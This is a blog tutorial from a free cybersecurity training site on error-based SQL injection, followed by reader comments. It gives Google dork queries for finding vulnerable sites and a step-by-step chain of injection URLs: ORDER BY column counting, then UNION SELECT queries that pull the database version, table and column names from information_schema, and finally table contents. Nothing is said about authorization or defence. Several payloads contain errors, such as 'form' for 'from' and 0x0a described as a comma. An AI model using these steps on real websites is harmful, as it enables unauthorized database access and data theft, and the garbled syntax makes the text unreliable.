Error Based SQL Injection: Best practices and projects

January 29, 2017 | Views: 14224

Begin Learning Cyber Security for FREE Now!

FREE REGISTRATIONAlready a Member Login Here

Estimated reading time: 3.5 minutes

Hello Leaders,

Today I’m going to talk about the second part of the SQL Injection article.

First, I want to explain the purpose of Error-based SQL injection. Don’t worry, it’s very simple.

RETRIEVING DATA FROM THE DATABASE

Today, we mostly use SQL injection for bypassing the login form or gaining access into an admin panel or retrieving the data. When attempting to bypass the login form, we use BLIND SQL INJECTION. In this article, I will talk about the error based SQL injection.

As the name suggests, error based means it is all based on the errors. In this attack, we will type or send something to the server by URL and the server will show us an error. After getting the error, we will decide on who the next target will be.

First, we have to find the SQL error based venerable website on Google. Go to Google and type the following:

inurl index.php ? id=

inurl gallery.php id=

The next goal is to find out if our page is currently talking or is connected with the database or not.

http://www.example.com/gallery.php?id=6

In order to find this, we just need to put a single quote after the id number like this:

http://www.example.com/gallery.php?id=6′

If it shows an error and the error is a SQL syntax error, then this page is connected with the database and website is also vulnerable.

What the single quest does is actually single quest breaks the query and the syntax of the query has been changed, or we could say that it was converted into the wrong syntax. So, we get the error SQL syntax error.

Now we know the website is vulnerable just need to find all the number of columns. Again we are going to inject a query for getting the error. Now, what we do is arrange all the columns in order.

http://www.example.com/gallery.php?id=6 order by 1

http://www.example.com/gallery.php?id=6 order by 2

http://www.example.com/gallery.php?id=6 order by 3

We will do this until it shows up in the unknow columns. If it shows the unknown column error on N, that means it has the total number of Columns N-1 because it shows the content in order by N-1.

Now we are going to find out which columns are connected to our current URL page so that we can say which columns are vulnerable. Technically it’s not vulnerable. It is just connected to our current URL page.

http://www.example.com/gallery.php?id=6 union all select 1,2,3,4,N-1.

It shows us the current page connected columns because we can only access the database by these columns.  It shows the columns’ number. If it shows 2,4 then 2 and 4 is connected with our current URL page. The next step is to find out the version and database.  We will do this by using any one of the 2 or 4. We are using 2 or 4 just because they are only connected to the current page.

http://www.example.com/gallery.php?id=6 union all select 1,version(),3,4,N-1.

http://www.example.com/gallery.php?id=6 union all select 1,database(),3,4,N-1.

We can find other information by using a few things. One thing every person should keep in mind is: The more information you have, the more powerful you will be.

If the version of SQL is more than 5.0.0, it means it has the schema. Schema is just like an index of all databases.

Now our next step is to find out all the table names. To do this, we will again inject a query.

http://www.example.com/gallery.php?id=6 union all select 1,group_concat(table_name),3,4,N-1 form Information_schema.tables where table_schema=database()–

It will show all the table names from the table_schema.

Our next step is to find out all the columns. Use the MySQL char value of any of the table names. Take any table name and convert it by using the hack bar into MySQL char and copy and paste it into the query.

http://www.example.com/gallery.php?id=6 union all select 1,group_concat(column_name),3,4,N-1 form Information_schema.columns where table_name=mysqlchar–

Now that we have the columns’ name, our final attack is to get the data because we have table name, columns name, and database name. Table_name should be the same that we used to mysqlchar for finding the columns’ name.

http://www.example.com/gallery.php?id=6 union all select 1,group_concat(column_name,0x0a),3,4,N-1 form table_name

0x0a is the hex value of comas(,).it will seprated the table data into comas.

Hope this information will help you to became more knowledgeable in error based SQL injection.

Thanks & Best Regards.

Share with Friends
FacebookTwitterLinkedInEmail
Use Cybytes and
Tip the Author!
Join
Share with Friends
FacebookTwitterLinkedInEmail
Ready to share your knowledge and expertise?
5 Comments
  1. I have doubt frnd
    what does abc abc mean

    example http://www.facebook.com abc abc
    what is this will do can you explain in detail for me bro

  2. OR MAY BE ITS HAS A .HTACCESS FILE CONFIGURATION

  3. Blind or Boolean SQL injection can be correlated.

  4. What if it shows unknown column error on order by 1 itself. Then we cannot do N-1. Hence how to proceed in such a case??

Comment on This

You must be logged in to post a comment.

Our Revolution

We believe Cyber Security training should be free, for everyone, FOREVER. Everyone, everywhere, deserves the OPPORTUNITY to learn, begin and grow a career in this fascinating field. Therefore, Cybrary is a free community where people, companies and training come together to give everyone the ability to collaborate in an open source way that is revolutionizing the cyber security educational experience.

Cybrary On The Go

Get the Cybrary app for Android for online and offline viewing of our lessons.

Get it on Google Play
 

Support Cybrary

Donate Here to Get This Month's Donor Badge

 
Skip to toolbar

We recommend always using caution when following any link

Are you sure you want to continue?

Continue
Cancel